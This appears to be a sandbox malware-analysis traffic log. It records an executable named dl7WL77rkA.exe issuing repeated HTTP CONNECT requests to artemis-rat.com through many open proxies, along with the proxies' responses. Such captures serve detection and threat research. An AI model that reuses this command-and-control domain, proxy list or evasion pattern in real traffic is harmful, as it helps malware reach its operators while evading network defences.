                                                                                                                                                                                                                                                            1841192.168.2.554380189.240.60.16490903876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.292401075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.569437981 CET | 72 | IN | HTTP/1.1 200 Connection established
Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1842192.168.2.553486135.148.10.161515073876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.314431906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.933489084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.681910992 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1843192.168.2.553407138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.321873903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1844192.168.2.553385148.72.206.84148153876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.330847025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1845192.168.2.555108195.248.243.14972373876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.331408978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.083230972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1846192.168.2.555086101.133.175.25131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.332768917 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.650299072 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1847192.168.2.554988103.182.112.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.334135056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.201996088 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.487344027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.989512920 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.306721926 CET39INHTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1848192.168.2.555145172.67.182.85803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341432095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.495811939 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1849192.168.2.555147104.19.5.247803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341674089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.496299982 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1850192.168.2.55507462.33.53.24831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.341902018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.737667084 CET39INHTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1851192.168.2.55508345.11.95.16660143876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.364449978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083447933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.843261957 CET39INHTTP/1.0 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1852192.168.2.55514323.94.214.890543876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.364850044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.706516981 CET34INHTTP/1.1 503 Service Unavailable


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1853192.168.2.554201109.238.181.5380833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.365632057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405160904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.807801008 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 28 Aug 1972 02:44:33 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 28 Aug 1972 02:44:33 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1854192.168.2.554976103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.366590977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1855192.168.2.555110154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.399254084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1856192.168.2.55431651.89.173.40204353876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.407978058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1857192.168.2.55433951.75.125.20827363876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.409012079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.083405972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.014702082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.014609098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.717869043 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.475100040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.205236912 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1858192.168.2.55513838.162.15.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.410212994 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.889553070 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1859192.168.2.55512839.105.27.3031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.429590940 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:46.811192036 CET | 38 | IN | HTTP/1.1 200 OK
content-length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1860192.168.2.555149194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.435410023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1861192.168.2.555112178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.448534966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1862192.168.2.555155194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.453797102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1863192.168.2.55346443.255.113.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.454054117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.092693090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1864192.168.2.55349645.240.182.12019813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.456950903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.594574928 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.702393055 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.708508968 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1865192.168.2.555115148.72.215.230443873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.460056067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1866192.168.2.555126123.126.158.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.464337111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.823081017 CET536INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 556
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE a
Mar 11, 2024 03:30:46.823093891 CET169IN
                                                                                                                                                                                                                                                            Data Ascii: nd Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1867192.168.2.55507047.91.65.2331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.467351913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.523102999 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1868192.168.2.554109162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.479585886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1869192.168.2.55515623.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.480792046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1870192.168.2.554290103.180.198.13081813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.481189013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1871192.168.2.55453238.54.101.25490003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.544573069 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
